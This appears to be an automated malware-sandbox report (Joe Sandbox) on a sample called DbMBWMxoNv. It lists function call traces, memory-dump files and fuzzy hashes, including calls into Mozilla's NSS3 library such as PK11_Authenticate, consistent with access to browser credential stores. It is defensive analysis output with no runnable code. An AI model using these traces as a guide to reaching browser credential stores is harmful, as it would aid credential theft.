Opcode ID: cc84ba3687aff7e418b257814a27fbbb1ecd2f906b84cea68a42ac5c635dc936
Instruction ID: 05ed198fbb1640a1b558bf5ffe97d66e0e5ebbc6939604b4126e39d066ef2033
Opcode Fuzzy Hash: cc84ba3687aff7e418b257814a27fbbb1ecd2f906b84cea68a42ac5c635dc936
Instruction Fuzzy Hash: 1C0124B1A001004BE710AB6CD401A7177E6EFC634CB15487CEC488B302EB22E8568796

Function 00419470 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(>=A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413D3E,?), ref: 0041948C
GetFileSizeEx.KERNEL32(000000FF,>=A), ref: 004194A9
CloseHandle.KERNEL32(000000FF), ref: 004194B7

Strings

>=A, xrefs: 004194A1, 004194CD, 004194A4
>=A, xrefs: 00419488, 0041948B

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: >=A$>=A
API String ID: 1378416451-3536956848
Opcode ID: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction ID: 3a34b71ed32a5e038d40ec36a38ffc71a9509a973990dc3d9b0a1b42c7eefbe1
Opcode Fuzzy Hash: 81ae9b57d178cb6c2b2619f3187fe4d96e31a0019182dee87d4c099c60224e91
Instruction Fuzzy Hash: F2F04F39E08208BBDB10DFB0EC59F9E77BAAB48710F14C655FA15A72C0E6749A418B85

Function 6CFAED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CFAED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6CFAEDCE

Part of subcall function 6CFA0BE0: malloc.MOZGLUE(6CF98D2D,?,00000000,?), ref: 6CFA0BF8
Part of subcall function 6CFA0BE0: TlsGetValue.KERNEL32(6CF98D2D,?,00000000,?), ref: 6CFA0C15

free.MOZGLUE(00000000,?,?,?,?,6CFAB04F), ref: 6CFAEE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CFAEECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CFAEEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CFAEEFB

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 8d3df6498a6c50391378beee2aff60e1132f66486d562e6b86e2033c07864660
Instruction ID: d2e0b17df78a15446cee28565ead04ba430ab616a45bcfe9814d99d31593271a
Opcode Fuzzy Hash: 8d3df6498a6c50391378beee2aff60e1132f66486d562e6b86e2033c07864660
Instruction Fuzzy Hash: B4816BB5A00205DFEB14CF99D884BABB7F5FF88308F154428E8159B751DB30E826CBA1

Function 6CFACCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6CFAC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CFADAE2,?), ref: 6CFAC6C2

PR_Now.NSS3 ref: 6CFACD35

Part of subcall function 6D009DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DC6
Part of subcall function 6D009DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D050A27), ref: 6D009DD1
Part of subcall function 6D009DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D009DED

Part of subcall function 6CF96C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CF41C6F,00000000,00000004,?,?), ref: 6CF96C3F

PR_GetCurrentThread.NSS3 ref: 6CFACD54

Part of subcall function 6D009BF0: TlsGetValue.KERNEL32(?,?,?,6D050A75), ref: 6D009C07

Part of subcall function 6CF97260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CF41CCC,00000000,00000000,?,?), ref: 6CF9729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CFACD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CFACE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CFACE2C

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6CFACE40

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

Part of subcall function 6CFACEE0: PORT_ArenaMark_Util.NSS3(?,6CFACD93,?), ref: 6CFACEEE
Part of subcall function 6CFACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CFACD93,?), ref: 6CFACEFC
Part of subcall function 6CFACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CFACD93,?), ref: 6CFACF0B
Part of subcall function 6CFACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CFACD93,?), ref: 6CFACF1D

Part of subcall function 6CFACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CFACD93,?), ref: 6CFACF47
Part of subcall function 6CFACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CFACD93,?), ref: 6CFACF67
Part of subcall function 6CFACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CFACD93,?,?,?,?,?,?,?,?,?,?,?,6CFACD93,?), ref: 6CFACF78

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 9403cde78cb103fb8bb06c9486697d9dd4f9394e7652296425943db5723781e8
Instruction ID: 652317df346426c7e0ee302ac87824bb9b1942ffabc56ec6fd2676183ad98b71
Opcode Fuzzy Hash: 9403cde78cb103fb8bb06c9486697d9dd4f9394e7652296425943db5723781e8
Instruction Fuzzy Hash: 2B51B476A04200DFEB10DFA9DC80BDAB7F4EF48348F254525D9599B740EB32E906CB91

Function 00414300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414325
RegOpenKeyExA.ADVAPI32(80000001,02D26058,00000000,00020119,?), ref: 00414344
RegQueryValueExA.ADVAPI32(?,02D25958,00000000,00000000,00000000,000000FF), ref: 00414368
RegCloseKey.ADVAPI32(?), ref: 00414372
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414397
lstrcatA.KERNEL32(?,02D25970), ref: 004143AB

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction ID: 95163f332e2e8486d22fa14c8026e7b1b291c890fe90cbe7f90fb3e747a5c624
Opcode Fuzzy Hash: 5ab39f87e3c408f2a90f24169347c873da2d30c2c471e45419c7dcdc3ee26daa
Instruction Fuzzy Hash: B641B8B6D001086BDB14EBA0EC46FEE773DAB8C300F04855EB7155A1C1EA7557888BE1

Function 6CF7EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON

Download Yara Rule

APIs

PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CF7EF38

Part of subcall function 6CF69520: PK11_IsLoggedIn.NSS3(00000000,?,6CF9379E,?,00000001,?), ref: 6CF69542

PK11_Authenticate.NSS3(?,00000001,?), ref: 6CF7EF53

Part of subcall function 6CF84C20: TlsGetValue.KERNEL32 ref: 6CF84C4C
Part of subcall function 6CF84C20: EnterCriticalSection.KERNEL32(?), ref: 6CF84C60
Part of subcall function 6CF84C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84CA1
Part of subcall function 6CF84C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CF84CBE
Part of subcall function 6CF84C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84CD2
Part of subcall function 6CF84C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CF84D3A

PR_GetCurrentThread.NSS3 ref: 6CF7EF9E

Part of subcall function 6D009BF0: TlsGetValue.KERNEL32(?,?,?,6D050A75), ref: 6D009C07

free.MOZGLUE(00000000), ref: 6CF7EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF7F016
free.MOZGLUE(00000000), ref: 6CF7F022

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 3fc2277890052d59f1a7b9304c8ac73222103131f2fa8cf2e5db08107558f037
Instruction ID: 7c0f4f56c2fc82f21268227930978cbc0c549537a4697bb111173b8d0bb00d0d
Opcode Fuzzy Hash: 3fc2277890052d59f1a7b9304c8ac73222103131f2fa8cf2e5db08107558f037
Instruction Fuzzy Hash: 5E417171E00209AFDF118FA9EC45BEE7BB9AF48358F04402AF914A7751E771C9158BA1

Function 0041B68C Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041B69A

Part of subcall function 0041B2BC: __mtinitlocknum.LIBCMT ref: 0041B2D2
Part of subcall function 0041B2BC: __amsg_exit.LIBCMT ref: 0041B2DE
Part of subcall function 0041B2BC: EnterCriticalSection.KERNEL32(?,?,?,0041AF70,0000000E,0042A228,0000000C,0041AF3A), ref: 0041B2E6

DecodePointer.KERNEL32(0042A268,00000020,0041B7DD,?,00000001,00000000,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E), ref: 0041B6D6
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A228,0000000C,0041AF3A), ref: 0041B6E7

Part of subcall function 0041C136: EncodePointer.KERNEL32(00000000,0041C393,004D5FB8,00000314,00000000,?,?,?,?,?,0041BA07,004D5FB8,Microsoft Visual C++ Runtime Library,00012010), ref: 0041C138

DecodePointer.KERNEL32(-00000004,?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A228,0000000C,0041AF3A), ref: 0041B70D
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A228,0000000C,0041AF3A), ref: 0041B720
DecodePointer.KERNEL32(?,0041B7FF,000000FF,?,0041B2E3,00000011,?,?,0041AF70,0000000E,0042A228,0000000C,0041AF3A), ref: 0041B72A

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: e21b160b4bf82173991cea87743b55a3e37d10a3cbbea29ea7427e14a16c1874
Instruction ID: 7b3d92d94678cd1b0cebdff54d6c011fc786e6f6b811e1317dae93f6d4dd17af
Opcode Fuzzy Hash: e21b160b4bf82173991cea87743b55a3e37d10a3cbbea29ea7427e14a16c1874
Instruction Fuzzy Hash: B831F974900349DFDF11AFA9D9856DDBAF1FF88314F14402BE460A62A0DB784985CF99

Function 6CF95ED0 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CF95D71), ref: 6CF95F0A
TlsGetValue.KERNEL32 ref: 6CF95F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6CF95F2F
PR_Unlock.NSS3(890008E8), ref: 6CF95F55
PR_SetError.NSS3(00000000,00000000), ref: 6CF95F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CF95F7D

Part of subcall function 6CF95220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CF95F82,8B4274C0), ref: 6CF95248
Part of subcall function 6CF95220: EnterCriticalSection.KERNEL32(0F6D060D,?,6CF95F82,8B4274C0), ref: 6CF9525C
Part of subcall function 6CF95220: PR_SetError.NSS3(00000000,00000000), ref: 6CF9528E
Part of subcall function 6CF95220: PR_Unlock.NSS3(0F6D05F1), ref: 6CF95299
Part of subcall function 6CF95220: free.MOZGLUE(00000000), ref: 6CF952A9

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID:
API String ID: 3150690610-0
Opcode ID: 6b7fa700ce600027092a234bb58fede1555ff8eb76d6b8accce576541f38402b
Instruction ID: a5da634ab985e09e429c29b4420c2e46b9b9ab7bcda59b3b7de646208c19d4c9
Opcode Fuzzy Hash: 6b7fa700ce600027092a234bb58fede1555ff8eb76d6b8accce576541f38402b
Instruction Fuzzy Hash: 5521A1B5C04204ABEF109F68DC45BEEBBB4FF49318F544129E90AAB741EB31A9548B91

Function 6CFD3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6CFD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CFD5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFD3D3F

Part of subcall function 6CF4BA90: PORT_NewArena_Util.NSS3(00000800,6CFD3CAF,?), ref: 6CF4BABF
Part of subcall function 6CF4BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CFD3CAF,?), ref: 6CF4BAD5
Part of subcall function 6CF4BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CFD3CAF,?), ref: 6CF4BB08
Part of subcall function 6CF4BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CFD3CAF,?), ref: 6CF4BB1A
Part of subcall function 6CF4BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CFD3CAF,?), ref: 6CF4BB3B

PR_EnterMonitor.NSS3(?), ref: 6CFD3CCB

Part of subcall function 6D009090: TlsGetValue.KERNEL32 ref: 6D0090AB
Part of subcall function 6D009090: TlsGetValue.KERNEL32 ref: 6D0090C9
Part of subcall function 6D009090: EnterCriticalSection.KERNEL32 ref: 6D0090E5
Part of subcall function 6D009090: TlsGetValue.KERNEL32 ref: 6D009116
Part of subcall function 6D009090: LeaveCriticalSection.KERNEL32 ref: 6D00913F

PR_EnterMonitor.NSS3(?), ref: 6CFD3CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CFD3CF8
PR_ExitMonitor.NSS3(?), ref: 6CFD3D15
PR_ExitMonitor.NSS3(?), ref: 6CFD3D2E

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: cb43a65477e0bd59d31d74376f815577f866a27025e228aae8720ad18fde4173
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: B71157B9A006046FF7205E65FC41B8BB2F4EF11308F1A4534E60ACB620E232F81DCA42

Function 6CF9FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CF9FE08

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CF9FE1D

Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CF9FE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CF9FE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CF9FE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6CF9FE6F

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 84bf06174ad1153eb7b5a71fb8a942d1da30fe7d4bd7d5d081a16a916e558c84
Instruction ID: 7df7e1140b2af481b7cf9c6b1a90c5c651cede94348f373279dd2f99a0d478fc
Opcode Fuzzy Hash: 84bf06174ad1153eb7b5a71fb8a942d1da30fe7d4bd7d5d081a16a916e558c84
Instruction Fuzzy Hash: A711A5B6A00205ABFF009B55EC40B9BB398AF54299F158034F91997B52E731D924C791

Function 6D04FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6D04FD9E

Part of subcall function 6D009BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CF31A48), ref: 6D009BB3
Part of subcall function 6D009BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CF31A48), ref: 6D009BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6D04FDB9

Part of subcall function 6CF2A900: TlsGetValue.KERNEL32(00000000,?,6D0A14E4,?,6CEC4DD9), ref: 6CF2A90F
Part of subcall function 6CF2A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CF2A94F

PR_Unlock.NSS3 ref: 6D04FDD4
PR_Lock.NSS3 ref: 6D04FDF2
PR_NotifyAllCondVar.NSS3 ref: 6D04FE0D
PR_Unlock.NSS3 ref: 6D04FE23

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: f0d2d87df8a4b1a185843c0442d41b530cbdaaf541ea38b763626d5765eec56b
